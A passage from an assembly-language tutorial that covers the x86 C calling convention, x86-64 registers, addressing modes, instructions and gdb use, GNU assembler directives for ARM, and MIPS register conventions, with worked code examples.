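# If the byte stored at the memory address in EBX is equal to the integer constant 10, jump to the location labeled loop.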


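call, ret (subroutine call and return)

These instructions implement a subroutine call and return. The call instruction first pushes the current code location onto the hardware-supported stack in memory (see the push instruction), and then performs an unconditional jump to the code location indicated by the label operand. Unlike the simple jmp instruction, call saves the location to return to when the subroutine completes, so that execution resumes right after the call.

The ret instruction implements the subroutine return mechanism. It first pops a code location (the return address) off the stack (similar to the pop instruction) and then performs an unconditional jump to the retrieved code location.

Syntax

call <label>
ret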

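3.3.5 Calling Convention

To allow separate programmers to share code and develop libraries for use by many programs, and to simplify the use of subroutines in general, programmers typically adopt a common calling convention. The calling convention is a protocol about how to call and return from routines. For example, given a set of calling convention rules, a programmer need not examine the definition of a subroutine to determine how parameters should be passed to it. Furthermore, given a set of calling convention rules, high-level language compilers can be made to follow them, allowing hand-coded assembly routines and high-level language routines to call one another.

We describe the widely used C language calling convention. Following this convention allows you to write assembly language subroutines that are safely callable from C (and C++) code, and also lets you call C library functions from your assembly language code.

The C calling convention is based heavily on the use of the hardware-supported stack. It relies on the push, pop, call, and ret instructions. Subroutine parameters are passed on the stack. Registers are saved on the stack, and local variables used by subroutines are placed on the stack. The vast majority of high-level procedural languages implemented on most processors use similar calling conventions.

The calling convention is broken into two sets of rules. The first set is employed by the caller of the subroutine, and the second set is observed by the writer of the subroutine (the callee). It should be emphasized that mistakes in following these rules quickly result in fatal program errors, since the stack will be left in an inconsistent state; take meticulous care when implementing the calling convention in your own subroutines.

[Figure 2: stack-convention, the stack during a subroutine call]

A good way to visualize the calling convention is to draw the contents of the nearby region of the stack during subroutine execution. Figure 2 depicts the contents of the stack during the execution of a subroutine with three parameters and three local variables. The cells depicted in the stack are 32-bit memory locations, so the memory addresses of the cells are 4 bytes apart. The first parameter resides at an offset of 8 bytes from the base pointer. Above the parameters on the stack (and below the base pointer) in the figure, the call instruction placed the return address, which leads to the extra 4 bytes of offset from the base pointer to the first parameter. When the ret instruction is used to return from the subroutine, it jumps to the return address stored on the stack.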

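3.3.5.1 Caller Rules

To make a subroutine call, the caller should:

1. Before calling the subroutine, save the contents of the registers designated caller-saved. The caller-saved registers are EAX, ECX, and EDX. Since the called subroutine is allowed to modify these registers, if the caller relies on their values after the subroutine returns, it must push them onto the stack so that they can be restored afterwards.
2. To pass parameters to the subroutine, push them onto the stack before the call. The parameters should be pushed in inverted order, that is, last parameter first. Since the stack grows down, the first parameter ends up stored at the lowest address. Historically, this inversion of parameters was used to allow functions to be passed a variable number of parameters.
3. To call the subroutine, use the call instruction. It places the return address on top of the parameters on the stack and branches to the subroutine code. The subroutine it invokes should follow the callee rules below.

After the subroutine returns (immediately following the call instruction), the caller can expect to find the return value of the subroutine in the register EAX. To restore the machine state, the caller should:

1. Remove the parameters from the stack. This restores the stack to its state before the call was performed.
2. Restore the contents of the caller-saved registers (EAX, ECX, EDX) by popping them off the stack. The caller can assume that no other registers were modified by the subroutine.

Example

The code below shows a function call that follows the caller rules. The caller is calling a function myFunc that takes three integer parameters. The first parameter is in EAX, the second parameter is the constant 216, and the third parameter is in the memory location whose address is stored in EBX.

push (%ebx)  # Push the last parameter first.
push $216    # Push the second parameter.
push %eax    # Push the first parameter last.

call myFunc  # Call the function (assume C naming).

add $12, %esp

Note that after the call returns, the caller cleans up the stack using the add instruction. There are 12 bytes of parameters on the stack (3 parameters of 4 bytes each), and the stack grows toward lower addresses. Thus, to get rid of the parameters, we can simply add 12 to the stack pointer.

The result produced by myFunc is now available in the register EAX. The values of the caller-saved registers (ECX and EDX) may have been changed. If the caller uses them after the call, it needs to save them on the stack before the call and restore them after it. In other words, the stack serves as temporary storage.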

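3.3.5.2 Callee Rules

The definition of the subroutine should adhere to the following rules at the beginning of the subroutine:

1. Push the value of EBP onto the stack, and then copy the value of ESP into EBP using the following instructions:

 push %ebp
 mov  %esp, %ebp

This initial action maintains the base pointer, EBP. By convention, the base pointer is used as a point of reference for finding parameters and local variables on the stack. While a subroutine is executing, the base pointer holds a copy of the stack pointer value from when the subroutine started executing. Parameters and local variables are always located at known, constant offsets from the base pointer value. We push the old base pointer value at the beginning of the subroutine so that we can later restore the appropriate base pointer value for the caller when the subroutine returns. Remember, the caller does not expect the subroutine to change the value of the base pointer. We then move the stack pointer into EBP to obtain our point of reference for accessing parameters and local variables.

2. Next, allocate local variables by making space on the stack. Recall that the stack grows down, so to make space on the top of the stack, the stack pointer should be decremented. The amount by which it is decremented depends on the number and size of the local variables needed. For example, if 3 local integers (4 bytes each) are required, the stack pointer needs to be decremented by 12 to make space for them (i.e. sub $12, %esp). As with parameters, local variables are located at known offsets from the base pointer.
3. Next, save the values of the callee-saved registers that will be used by the function. To save registers, push them onto the stack. The callee-saved registers are EBX, EDI, and ESI (ESP and EBP are also preserved by the calling convention, but need not be pushed in this step).

After these three actions are performed, the body of the subroutine may proceed. When the subroutine returns, it must follow these steps:

1. Leave the return value in EAX.
2. Restore the old values of any callee-saved registers (EBX, EDI, and ESI) that were modified. The register contents are restored by popping them from the stack, in the reverse of the order in which they were pushed.
3. Deallocate local variables. The obvious way to do this is to add the appropriate value to the stack pointer (since the space was allocated by subtracting the needed amount from it). In practice, a less error-prone way to deallocate the variables is to move the value in the base pointer into the stack pointer: mov %ebp, %esp. This works because the base pointer always contains the value that the stack pointer held immediately before the local variables were allocated.
4. Immediately before returning, restore the caller's base pointer value by popping EBP off the stack. Recall that the first thing we did on entry to the subroutine was to push the base pointer to save its old value.
5. Finally, return to the caller by executing a ret instruction. This instruction finds and removes the appropriate return address (the one saved by call) from the stack.

Note that the callee's rules fall cleanly into two halves that are basically mirror images of one another. The first half applies to the beginning of the function and is commonly called the function prologue. The second half applies to the end of the function and is therefore commonly called the function epilogue.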

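Example

Here is an example function definition that follows the callee rules:

# Start the code section
.text

# Define myFunc as a global (exported) function
.globl myFunc
.type myFunc, @function
myFunc:
# Subroutine prologue
push %ebp            # Save the old base pointer value.
mov %esp, %ebp       # Set the new base pointer value.
sub $4, %esp         # Make room for one 4-byte local variable.
push %edi
push %esi            # This function modifies EDI and ESI, so save them first.
# No need to save EBX, EBP, or ESP.

# Subroutine body
mov 8(%ebp), %eax    # Move the value of parameter 1 into EAX.
mov 12(%ebp), %esi   # Move the value of parameter 2 into ESI.
mov 16(%ebp), %edi   # Move the value of parameter 3 into EDI.

mov %edi, -4(%ebp)   # Move EDI into the local variable.
add %esi, -4(%ebp)   # Add ESI to the local variable.
add -4(%ebp), %eax   # Add the contents of the local variable to EAX (the final result).

# Subroutine epilogue
pop %esi             # Restore register values.
pop %edi
mov %ebp, %esp       # Deallocate the local variable.
pop %ebp             # Restore the caller's base pointer value.
ret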

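The subroutine prologue performs the standard actions of saving a snapshot of the stack pointer in EBP (the base pointer), allocating local variables by decrementing the stack pointer, and saving register values on the stack.

In the body of the subroutine we can see the use of the base pointer. Both parameters and local variables are located at constant offsets from the base pointer for the duration of the subroutine's execution. In particular, since parameters were placed onto the stack before the subroutine was called, they are always located below the base pointer in the stack diagram (i.e. at higher addresses). The first parameter to the subroutine can always be found at memory location (EBP+8), the second at (EBP+12), and the third at (EBP+16). Similarly, since local variables are allocated after the base pointer is set, they always reside above the base pointer in the stack diagram (i.e. at lower addresses). In particular, the first local variable is always located at (EBP-4), the second at (EBP-8), and so on. This conventional use of the base pointer lets us quickly identify the use of local variables and parameters within a function body.

The function epilogue is basically a mirror image of the function prologue. The caller's register values are recovered from the stack, the local variables are deallocated by resetting the stack pointer, the caller's base pointer value is recovered, and the ret instruction returns to the appropriate code location in the caller.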
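To make the offsets concrete, the following Python sketch replays the caller and callee rules for a call to myFunc on a toy stack. It is a simplified model under stated assumptions: memory is a dictionary keyed by address, the starting ESP and EBP values and the return-address placeholder are arbitrary, and the saving of EDI and ESI is left out because the model has no registers to clobber. The function name `simulate_myfunc_call` is hypothetical.

```python
def simulate_myfunc_call(arg1, arg2, arg3):
    """Replay the cdecl steps for myFunc(arg1, arg2, arg3) on a toy stack."""
    mem = {}
    esp = 0x1000   # arbitrary initial stack pointer (assumption)
    ebp = 0x2000   # arbitrary caller base pointer (assumption)

    def push(value):
        nonlocal esp
        esp -= 4
        mem[esp] = value

    # Caller: push parameters last-to-first, then `call` pushes the return address.
    push(arg3)
    push(arg2)
    push(arg1)
    push(0xDEADBEEF)            # placeholder return address

    # Callee prologue: push %ebp; mov %esp, %ebp; sub $4, %esp
    push(ebp)
    ebp = esp
    esp -= 4                    # one local variable at EBP-4

    # Body: local = arg3 + arg2; EAX = arg1 + local
    mem[ebp - 4] = mem[ebp + 16]
    mem[ebp - 4] += mem[ebp + 12]
    eax = mem[ebp + 8] + mem[ebp - 4]

    # Epilogue: mov %ebp, %esp; pop %ebp; ret
    esp = ebp
    ebp = mem[esp]
    esp += 4
    esp += 4                    # ret pops the return address

    # Caller cleanup: add $12, %esp
    esp += 12
    return eax & 0xFFFFFFFF, esp, ebp

print(simulate_myfunc_call(1, 2, 3))  # (6, 4096, 8192)
```

The returned ESP and EBP match their starting values, which is the point of the convention: after the call and cleanup, the caller's stack and base pointer are exactly as they were.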

See also: Wikipedia, "x86 calling conventions".

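3.4 x64 Assembly Basics

3.4.1 Introduction

x86-64 (also known as x64 or AMD64) is the 64-bit version of the x86/IA32 instruction set. What follows is an overview of the features relevant to CS107.

3.4.2 Registers

The figure below lists the commonly used registers (16 general-purpose registers plus 2 special-purpose registers). Each register is 64 bits wide; the lower 32, 16, and 8 bits are each addressable as a 32-, 16-, or 8-bit register under a name of its own. Some registers are designated for a certain purpose, such as %rsp being used as the stack pointer or %rax for the return value from a function. Other registers are all-purpose, but have a conventional use depending on whether they are caller-owned or callee-owned. If the function binky calls winky, we refer to binky as the caller and winky as the callee. For example, the registers used for the first 6 arguments and the return value are all callee-owned. The callee can freely use those registers, overwriting existing values without taking any precautions. If %rax holds a value the caller wants to retain, the caller must copy the value to a "safe" location before making the call. The callee-owned registers are ideal for scratch or temporary use by the callee. In contrast, if the callee intends to use a caller-owned register, it must first preserve its value and restore it before exiting the call. The caller-owned registers are used for local state of the caller that needs to be preserved across further function calls.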

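3.4.3 Addressing Modes

True to its CISC nature, x86-64 supports a variety of addressing modes. An addressing mode is an expression that calculates an address in memory to be read or written. These expressions are used as the source or destination for a mov instruction and for other instructions that access memory. The code below demonstrates how to write the immediate value 1 to various memory locations using each of the available addressing modes:

movl $1, 0x604892          # Direct (the address is a constant value)
movl $1, (%rax)            # Indirect (the address is in register %rax)

movl $1, -24(%rbp)         # Indirect with displacement
                           # (address = base %rbp + displacement -24)

movl $1, 8(%rsp, %rdi, 4)  # Indirect with displacement and scaled index
                           # (address = base %rsp + displacement 8 + index %rdi * scale 4)

movl $1, (%rax, %rcx, 8)   # Special case of scaled index: displacement assumed to be 0

movl $1, 0x8(, %rdx, 4)    # Special case of scaled index: base assumed to be 0
movl $1, 0x4(%rax, %rcx)   # Special case of scaled index: scale assumed to be 1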

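3.4.4 Common Instructions

First, a reminder about instruction suffixes: many instructions have a suffix (b, w, l, or q) that indicates the bit width of the operation (1, 2, 4, or 8 bytes respectively). The suffix may be omitted when the width can be determined from the operands. For example, if the destination register is %eax, the operation must be 4 bytes wide; if it is %ax, 2 bytes; and %al is 1 byte. A few instructions, such as movs and movz, have two suffixes: the first is for the source operand and the second for the destination. For example, movzbl moves a 1-byte source value to a 4-byte destination.

When the destination is a sub-register, only those specific bytes of the register are written, with one exception: a 32-bit instruction zeroes the upper 32 bits of the destination register.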
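The sub-register write rule, including the 32-bit exception, can be sketched in Python. The function name `write_sub` is hypothetical and a register is modeled as a plain 64-bit integer.

```python
MASK64 = (1 << 64) - 1

def write_sub(reg64, value, bits):
    """Model writing `value` to the low `bits` bits of a 64-bit register."""
    if bits == 64:
        return value & MASK64
    if bits == 32:
        return value & 0xFFFFFFFF      # the exception: upper 32 bits become 0
    mask = (1 << bits) - 1             # 8- or 16-bit write
    return (reg64 & ~mask & MASK64) | (value & mask)  # other bytes are untouched

rax = 0x1122334455667788
print(hex(write_sub(rax, 0xAABB, 16)))      # 0x112233445566aabb
print(hex(write_sub(rax, 0xFF, 8)))         # 0x11223344556677ff
print(hex(write_sub(rax, 0xAABBCCDD, 32)))  # 0xaabbccdd
```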

`mov` and `lea`

By far the most frequent instruction you will encounter is mov, in one of its many variants. It behaves as in the 32-bit x86 section above, and so does lea, so neither is described again here.

A few interesting examples:

mov 8(%rsp), %eax        # %eax = value read from address %rsp + 8
lea 0x20(%rsp), %rdi     # %rdi = %rsp + 0x20
lea (%rdi,%rdx,1), %rax  # %rax = %rdi + %rdx

When copying a smaller bit width to a larger one, the movs and movz variants specify how to fill the additional bytes: the extra space is filled either with zeros (zero-extend) or with copies of the sign bit (sign-extend).

movsbl %al, %edx     # Copy 1-byte %al, sign-extended, into 4-byte %edx.
movzbl %al, %edx     # Copy 1-byte %al, zero-extended, into 4-byte %edx.
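The difference between the two extensions shows up only when the top bit of the source byte is set. A minimal Python sketch, using function names borrowed from the instructions purely as labels:

```python
def movzbl(al):
    """Zero-extend an 8-bit value to 32 bits."""
    return al & 0xFF

def movsbl(al):
    """Sign-extend an 8-bit value to 32 bits (result shown as unsigned)."""
    al &= 0xFF
    return al | 0xFFFFFF00 if al & 0x80 else al

print(hex(movzbl(0x80)))  # 0x80
print(hex(movsbl(0x80)))  # 0xffffff80: 0x80 is -128 as a signed byte
print(hex(movsbl(0x7F)))  # 0x7f: positive values are unchanged
```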

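A special case to note is that a mov that writes a 32-bit value into a register also zeroes the upper 32 bits of that register by default, i.e. it implicitly zero-extends to bit width q. This explains instructions such as mov %ebx, %ebx that look odd but are in fact being used to zero-extend from 32 to 64 bits. Because this is the default, there is no need for an explicit movzlq instruction. There is a movslq instruction to sign-extend from 32 to 64 bits.

The cltq instruction is a specialized move that operates on %rax. This no-operand instruction sign-extends within %rax, with source bit width l and destination bit width q.

cltq   # Operates on %rax: sign-extends the 4-byte source to the 8-byte destination; equivalent to movslq %eax, %rax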

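Arithmetic and Bitwise Operations

Binary operations are generally expressed in a two-operand form in which the second operand is both a source and the destination: the result is stored in the second operand. The first operand can be an immediate constant, a register, or a memory location. The second operand must be a register or memory. At most one of the two operands can be a memory location. Unary operations take a single operand that is both source and destination; it can be a register or memory. Many arithmetic instructions are used for both signed and unsigned types, that is, there is no separate signed add and unsigned add: the same instruction serves both. Where needed, the condition codes set by the operation can be used to detect the different kinds of overflow.

add src, dst   # dst = dst + src
sub src, dst   # dst = dst - src
imul src, dst  # dst = dst * src
neg dst        # dst = -dst (arithmetic negation)

and src, dst   # dst = dst & src
or src, dst    # dst = dst | src
xor src, dst   # dst = dst ^ src
not dst        # dst = ~dst (bitwise complement)

shl count, dst  # dst <<= count (left shift by count); sal is a synonym
sar count, dst  # dst >>= count (arithmetic right shift by count)
shr count, dst  # dst >>= count (logical right shift by count)

# Some instructions have special-case variants with a different number of operands
imul src  # One-operand imul assumes the other operand is in %rax and computes a 128-bit result, storing the high 64 bits in %rdx and the low 64 bits in %rax.
shl dst   # dst <<= 1 (with no count operand the shift is by 1; the same holds for sar, shr, and sal)

These instructions were covered in the previous section and are only summarized here.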

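Control Flow Instructions

There is a special %eflags register that stores a set of boolean flags called the condition codes. Most arithmetic operations update those codes. A conditional jump reads the condition codes to determine whether to take the branch. The condition codes include ZF (zero flag), SF (sign flag), OF (overflow flag, signed), and CF (carry flag, unsigned). For example, ZF is set if the result is 0, and OF is set if the operation overflowed (into the sign bit).

The general pattern is to execute a cmp or test operation to set the flags, followed by a jump variant that reads the flags to determine whether to take the branch or continue with the next instruction. The operands to cmp or test can be immediate constants, registers, or memory locations (with at most one memory operand). There are 32 variants of conditional jump, several of which are synonyms. Some of the branch instructions are listed below.

cmpl op2, op1  # result = op1 - op2; discards the result and sets the condition codes
test op2, op1  # result = op1 & op2; discards the result and sets the condition codes

jmp target  # unconditional jump
je target   # jump if equal; synonym jz, jump if zero (ZF = 1)
jne target  # jump if not equal; synonym jnz, jump if not zero (ZF = 0)
jl target   # jump if less; synonym jnge, jump if not greater or equal (SF != OF)
jle target  # jump if less or equal; synonym jng, jump if not greater (ZF = 1 or SF != OF)
jg target   # jump if greater; synonym jnle, jump if not less or equal (ZF = 0 and SF = OF)
jge target  # jump if greater or equal; synonym jnl, jump if not less (SF = OF)
ja target   # jump if above (unsigned greater); synonym jnbe, jump if not below or equal (CF = 0 and ZF = 0)
jb target   # jump if below (unsigned less); synonym jnae, jump if not above or equal (CF = 1)
js target   # jump if SF = 1
jns target  # jump if SF = 0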
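The flag conditions in the listing above can be checked with a small Python model of cmp. This is a sketch under stated assumptions: `cmp_flags` and the predicate functions are hypothetical names, operands are 32 bits wide by default, and only ZF, SF, CF, and OF are modeled.

```python
def cmp_flags(op2, op1, bits=32):
    """Model `cmp op2, op1` (AT&T operand order): flags of op1 - op2."""
    mask = (1 << bits) - 1
    sign = 1 << (bits - 1)
    a, b = op1 & mask, op2 & mask
    result = (a - b) & mask
    return {
        "ZF": result == 0,
        "SF": bool(result & sign),
        "CF": a < b,                                # unsigned borrow
        "OF": bool((a ^ b) & (a ^ result) & sign),  # signed overflow
    }

def jl(f): return f["SF"] != f["OF"]                # signed less
def jg(f): return not f["ZF"] and f["SF"] == f["OF"]  # signed greater
def jb(f): return f["CF"]                           # unsigned below
def ja(f): return not f["CF"] and not f["ZF"]       # unsigned above

# Compare op1 = 0xFFFFFFFF with op2 = 1.
f = cmp_flags(1, 0xFFFFFFFF)
print(jl(f), ja(f))  # True True: -1 < 1 as signed, but 4294967295 > 1 as unsigned
```

The same bit pattern takes different branches depending on whether the signed (jl, jg) or unsigned (jb, ja) conditions are used.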

Most of this was already covered in the previous section; it is repeated here as a review.

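`setx` and `cmovx`

Two other families of instructions can read and react to the current condition codes. The setx instructions set a destination register to 0 or 1 according to the status of condition x. The cmovx instructions conditionally execute a mov depending on whether condition x holds. The x is a placeholder for any of the condition variants, for example e, ne, s, or ns, with the meanings given above.

sete dst         # Set dst to 0 or 1 based on the zero/equal condition.
setge dst        # Set dst to 0 or 1 based on the greater/equal condition.
cmovns src, dst  # Perform the mov only if the ns condition holds.
cmovle src, dst  # Perform the mov only if the le condition holds.

For the setx instructions, the destination must be a single-byte register (e.g. %al for the low byte of %rax). For the cmovx instructions, the destination must be a register; the source may be a register or a memory location, but not an immediate.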

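Function Calls and the Stack

The %rsp register is used as the "stack pointer"; push and pop are used to add and remove values on the stack. The push instruction takes one operand: an immediate, a register, or a memory location. Push decrements %rsp and then copies the operand to the topmost position on the stack. The pop instruction takes one operand, the destination register. Pop copies the topmost value on the stack to the destination and then increments %rsp. It is also acceptable to adjust %rsp directly in order to add or remove an entire array or a collection of variables with a single instruction. Note that the stack grows downward (toward lower addresses).

push %rbx        # Push %rbx onto the stack.
pushq $0x3       # Push the immediate value 3 onto the stack.
sub $0x10, %rsp  # Adjust the stack pointer to set aside 16 bytes.

pop %rax         # Pop the topmost value from the stack into %rax.
add $0x10, %rsp  # Adjust the stack pointer to remove the topmost 16 bytes.

Control passes between functions through call and return. The callq instruction takes one operand, the address of the function being called. It pushes the return address onto the stack; this is the current value of %rip, which is the address of the instruction following the call. It then jumps to the address of the function being called. The retq instruction pops that address off the stack into %rip, so the program resumes at the saved return address, directly after the point it left.

To set up such a call, the caller first places the first six arguments into the registers %rdi, %rsi, %rdx, %rcx, %r8, and %r9 (any additional arguments are pushed onto the stack) and then executes the call instruction.

mov $0x3, %rdi  # The first argument goes in %rdi.
mov $0x7, %rsi  # The second argument goes in %rsi.
callq binky     # Transfer control to binky.

When the callee finishes, it writes the return value (if any) to %rax, cleans up the stack, and uses the retq instruction to return control to the caller.

mov $0x0, %eax   # Write the return value to %rax.
add $0x10, %rsp  # Clean up the stack.
retq             # Return control by jumping to the return address.

The targets of these branch and call instructions are usually absolute addresses determined at compile time. In some cases, however, the absolute address of the target is not known until the program runs, for example a switch statement compiled into a jump table, or a call through a function pointer. In these cases, the target address is first computed and stored in a register, and then the indirect variant jmp *%rax or callq *%rax reads the target address from the specified register.

The simpler alternative, of course, is a label, as described in the previous section.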

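3.4.5 Assembly and gdb

The debugger has many features that let you trace and debug code at the assembly level. You can print the value in a register by prefixing its name with $, or use the command info reg to dump the values of all registers:

(gdb) p $rsp
(gdb) info reg

The disassemble command prints the disassembly for a function by name. The x command supports an i format, which interprets the contents of a memory address as encoded instructions and decodes them.

(gdb) disassemble main //disassemble and print all instructions of main
(gdb) x/8i main //disassemble and print the first 8 instructions

You can set a breakpoint at a particular assembly instruction by its direct address or by an offset within a function.

(gdb) b *0x08048375
(gdb) b *main+7 //break at the address main + 7 bytes

You can advance by instruction (instead of by source line) using the stepi and nexti commands.

(gdb) stepi
(gdb) nexti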

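3.5 ARM Assembly Basics

3.5.1 Introduction

This chapter is a quick guide to ARM assembly under the GNU assembler. All code examples use the following layout:

[<label>:] {<instruction or directive>} @ comment

The GNU assembler does not require instructions to be indented. Labels are recognized by the trailing colon, regardless of their position on the line. A simple program serves as an introduction:

.section .text, "x"
.global   add                @ give the symbol add external linkage
add:
       ADD    r0, r0, r1     @ add the two input arguments
       MOV    pc, lr         @ return from subroutine
                             @ end of program

It defines a function add that takes two input arguments and returns their sum. With this example understood, the similar programs that follow should be easy to read.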

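3.5.2 GNU Assembler Directives for ARM

The GNU assembler directives available for ARM include the following:

GNU assembler directive	Description
`.ascii "<string>"`	Inserts the string as data into the program.
`.asciz "<string>"`	Like .ascii, but follows the string with a zero byte.
`.balign <power_of_2> {,<fill_value>{,<max_padding>} }`	Aligns the address to `<power_of_2>` bytes. The assembler aligns by adding bytes of value `<fill_value>` or a suitable default. The alignment does not occur if more than `<max_padding>` fill bytes would be required (similar to ALIGN in armasm).
`.byte <byte1> {,<byte2> } …`	Inserts a list of byte values as data into the program.
`.code <number_of_bits>`	Sets the instruction width in bits. Use 16 for Thumb and 32 for ARM (similar to CODE16 and CODE32 in armasm).
`.else`	Used with .if and .endif (similar to ELSE in armasm).
`.end`	Marks the end of the assembly file (usually omitted).
`.endif`	Ends a conditional compilation block; see .if, .ifdef, .ifndef (similar to ENDIF in armasm).
`.endm`	Ends a macro definition; see .macro (similar to MEND in armasm).
`.endr`	Ends a repeat loop; see .rept and .irp (similar to WEND in armasm).
`.equ <symbol name>, <value>`	Sets the value of a symbol (similar to EQU in armasm).
`.err`	Causes assembly to halt with an error.
`.exitm`	Exits a macro partway through; see .macro (similar to MEXIT in armasm).
`.global <symbol>`	Gives the symbol external linkage (similar to EXPORT in armasm).
`.hword <short1> {,<short2> }...`	Inserts a list of 16-bit values as data into the program (similar to DCW in armasm).
`.if <logical_expression>`	Makes a block of code conditional. End the block with .endif (similar to IF in armasm). See also .else.
`.ifdef <symbol>`	Includes a block of code if `<symbol>` is defined. End the block with .endif.
`.ifndef <symbol>`	Includes a block of code if `<symbol>` is not defined. End the block with .endif.
`.include "<filename>"`	Includes the specified source file (similar to INCLUDE in armasm or #include in C).
`.irp <param> {,<val_1>} {,<val_2>} ...`	Repeats a block of code once for each value in the value list. Mark the end of the block with .endr. Inside the repeated block, use `\<param>` to substitute the associated value from the list.
`.macro <name> {<arg_1>} {,< arg_2>} ... {,<arg_N>}`	Defines an assembler macro called `<name>` with N parameters. The macro definition must end with `.endm`. To leave the macro early, use `.exitm`. These directives are similar to MACRO, MEND, and MEXIT in armasm. Dummy macro parameters must be preceded by `\`.
`.rept <number_of_times>`	Repeats a block of code the given number of times. End with `.endr`.
`<register_name> .req <register_name>`	Names a register. It is similar to the `RN` directive in armasm, except that you must supply a name rather than a number on the right-hand side (e.g. `acc .req r0`).
`.section <section_name> {,"<flags> "}`	Starts a new code or data section. GNU provides the sections `.text` (code), `.data` (initialized data), and `.bss` (uninitialized data). These sections have default flags, and the linker understands the default names (similar to the armasm directive AREA). The following flags are allowed for ELF files: a (allocatable section), w (writable section), x (executable section).
`.set <variable_name>, <variable_value>`	Sets the value of a variable (similar to SETA in armasm).
`.space <number_of_bytes> {,<fill_byte> }`	Reserves the given number of bytes. The bytes are filled with zero, or with `<fill_byte>` if specified (similar to SPACE in armasm).
`.word <word1> {,<word2>}...`	Inserts a list of 32-bit word values as data into the program (similar to DCD in armasm).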

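3.5.3 Register Names

General registers: %r0 - %r15

Floating-point (fp) registers: %f0 - %f7

Temporary (non-saved) registers: %r0 - %r3, %r12

Saved registers: %r4 - %r10

Stack pointer register: %sp

Frame pointer register: %fp

Link register: %lr

Program counter: %pc

Status register: $psw

Status flag registers: xPSR, xPSR_all, xPSR_f, xPSR_x, xPSR_ctl, xPSR_fs, xPSR_fx, xPSR_fc, xPSR_cs, xPSR_cf, xPSR_cx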

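3.5.4 Assembler Special Characters and Syntax

Inline comment character: '@'

Line comment character: '#'

Statement separator: ';'

Immediate operand prefix: '#' or '$'

3.5.5 ARM Procedure Call Standard

Argument registers: %a1 - %a4 (aliases for %r0 - %r3)

Variable registers: %v1 - %v6 (aliases for %r4 - %r9); the return value is passed in %r0

3.5.6 Addressing Modes

addr: absolute addressing

%rn: register direct addressing

[%rn]: register indirect or indexed addressing

[%rn, #n]: register-based with offset

Here "rn" stands for any register other than the control registers.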

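3.5.7 Machine-Dependent Directives

Directive	Description
.arm	Assemble using ARM mode
.thumb	Assemble using Thumb mode
.code16	Assemble using Thumb mode
.code32	Assemble using ARM mode
.force_thumb	Force Thumb mode (even if not supported)
.thumb_func	Mark the entry point as Thumb-coded (force a bx entry)
.ltorg	Start a new literal pool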

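3.6 MIPS Assembly Basics

Data Types and Literals

Data types:
- Instructions are all 32 bits
- Byte (8 bits), halfword (2 bytes), word (4 bytes)
- A character requires 1 byte of storage
- An integer requires 1 word (4 bytes) of storage
Literals:
- Numbers entered as is, e.g. 4
- Characters enclosed in single quotes, e.g. 'b'
- Strings enclosed in double quotes, e.g. "A string"

Registers

32 general-purpose registers
Register names are preceded by $

Two formats are used for addressing registers:

By register number, e.g. $0 through $31
By equivalent name, e.g. $t1, $sp
The special registers Lo and Hi store the results of multiplication and division
- They are not directly addressable; their contents are accessed with the special instructions mfhi ("move from Hi") and mflo ("move from Lo")
The stack grows from high memory to low memory

Register	Alias	Use
`$0`	`$zero`	Constant value 0
`$1`	`$at`	Reserved for the assembler
`$2-$3`	`$v0-$v1`	Function return values (results and expression evaluation)
`$4-$7`	`$a0-$a3`	Function call arguments
`$8-$15`	`$t0-$t7`	Temporaries (free to use)
`$16-$23`	`$s0-$s7`	Saved values (must be saved and restored if used)
`$24-$25`	`$t8-$t9`	Temporaries (free to use)
`$26-$27`	`$k0-$k1`	Reserved for interrupt/trap handlers
`$28`	`$gp`	Global pointer
`$29`	`$sp`	Stack pointer
`$30`	`$fp`	Frame pointer
`$31`	`$ra`	Return address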

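A closer look at these registers:

zero: Normally used as a source register; reading it always returns 0. It can also be named as a destination register, but the write has no effect. Why dedicate a register to a single number? For efficiency: MIPS arithmetic instructions operate on registers rather than memory, so the most commonly used constant, 0, is given a register of its own.
at: Reserved for the assembler. It is used when loading constants wider than 16 bits: the compiler or assembler has to split the large constant and reassemble it in a register. System programmers can also use this register explicitly; an assembler directive is available to forbid the assembler from using at after that directive.
v0, v1: Used for function return values; most of the time v0 alone is enough. If the return value is larger than 8 bytes, it has to go on the stack: the caller allocates an anonymous structure on its stack and sets up a pointer to it, and on return v0 points to that structure. The compiler handles all of this automatically.
a0-a3: Used to pass arguments to a called function. Consider ret = strncmp("bear", "bearer", 4): the arguments total less than 16 bytes, so they fit in registers. Inside strncmp, a0 holds the address of the string "bear" in the read-only data area, a1 holds the address of "bearer", and a2 holds 4.
t0-t9 (temporary registers) and s0-s8 (saved registers): These two groups are best described together. They are the registers seen most often in MIPS assembly, and both are used to hold data for computation, shifts, comparisons, loads, stores, and so on. The difference is that a subroutine may use t0-t9 freely without saving them, which makes them well suited to the "temporary" values that arise while evaluating expressions. Such values must be consumed before jumping to another function, because the callee is likely to use the same registers without any protection. If a subroutine does not call other functions, it is advisable to use t0-t9 as much as possible, which avoids the save at function entry and the restore at exit. By contrast, a subroutine that uses s0-s8 must store them on the stack and restore them before it returns, so that from the caller's point of view their values have not changed.
k0, k1: Reserved for use in the exception handling flow. What is special about that flow? When a MIPS CPU is running a task and an external interrupt or exception occurs, the CPU immediately jumps to an exception handler at a fixed address and records, in the EPC register (Exception Program Counter), the instruction address at which the task should resume. By habit, the exception handler begins by saving the context, i.e. the MIPS registers, to the interrupt stack, and restores those registers before returning. This raises a question: where is the EPC value kept? The last instruction of the handler must be a jr x, where x is a MIPS register. If the return address were placed in one of the registers mentioned earlier, such as t0 or s0, that register would no longer hold its pre-exception value when the PC jumps back to the task. A dedicated register is therefore needed to hold the return address, and that is k0; the handler can then return with a single jr k0. k1 is the other register dedicated to exceptions; it can be used to record the interrupt nesting depth. While the CPU executes task code, k1 can be set to 0; each entry into interrupt context adds 1 and each exit subtracts 1, so the nesting depth is tracked. This depth is often useful when debugging, and an application may need to know whether it is currently running in task or interrupt context, which it can determine by checking whether k1 is 0.
sp: Points to the top of the stack currently in use; because the stack grows toward lower addresses, the most recently stored item is at the lowest address in use. In a system with an RTOS, each task has its own stack space and its own live copy of sp, and interrupts have their own stack space and sp copy as well; these are saved and restored during context switches.
gp: An auxiliary register whose meaning is somewhat loose. MIPS officially suggests two uses. One is to point to the global offset table used for data references outside position-independent code in Linux applications. The other, in small embedded systems running an RTOS, is to point to a frequently accessed region of global data: since MIPS instructions are 32 bits long and the offset inside an instruction is a signed 16-bit value, a single instruction can reach addresses within a signed 16-bit offset (roughly plus or minus 32 KB) of gp, which improves efficiency. How does the compiler know the initial value of gp? Adding a _gp symbol to the link script is enough; the linker takes it as the value of gp, and at power-up we simply load the value of _gp into the gp register. All of this is a suggestion from the MIPS designers, not a requirement; I have also seen gp used as transitional storage for sp during interrupt and task switches, which works too.
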